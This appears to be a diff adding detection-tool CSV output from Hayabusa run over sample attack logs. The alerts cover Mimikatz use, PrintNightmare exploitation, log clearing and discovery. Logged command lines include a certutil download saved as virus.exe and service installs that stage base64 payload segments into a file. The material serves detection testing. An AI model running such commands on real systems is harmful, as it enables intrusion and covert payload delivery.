+2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,849,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,301,critical,LatMov | CredAccess,Mimikatz 
Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,848,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,5142,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,300,critical,LatMov | CredAccess,Mimikatz 
Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-27 19:35:56.899 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: 
C:\Windows\System32\dllhost.exe | PID: 0xf08 | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\spoolsv.exe | LID: 0x3e7 | PID: 3388 | PGUID: 7CF65FC7-A881-617A-0605-000000001300 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx +2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx +2021-10-31 23:28:15.331 +09:00,jump01.offsec.lan,4104,low,Disc,Suspicious Get Local Groups Information,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_local_group_reco.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 23:28:15.342 +09:00,jump01.offsec.lan,4103,low,Disc,Suspicious Get Local Groups 
Information,,rules/sigma/powershell/powershell_module/posh_pm_suspicious_local_group_reco.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx +2021-11-02 23:15:24.567 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: certutil -urlcache -split -f https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/blob/master/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec%20remote%20trask%20creation%20(GLOBAL).evtx virus.exe | Path: C:\Windows\System32\certutil.exe | PID: 0xedc | User: admmig | LID: 0x5ba37",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx +2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 
17:15:14.789 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:25.150 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed 
via service - Tchopper.evtx" +2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 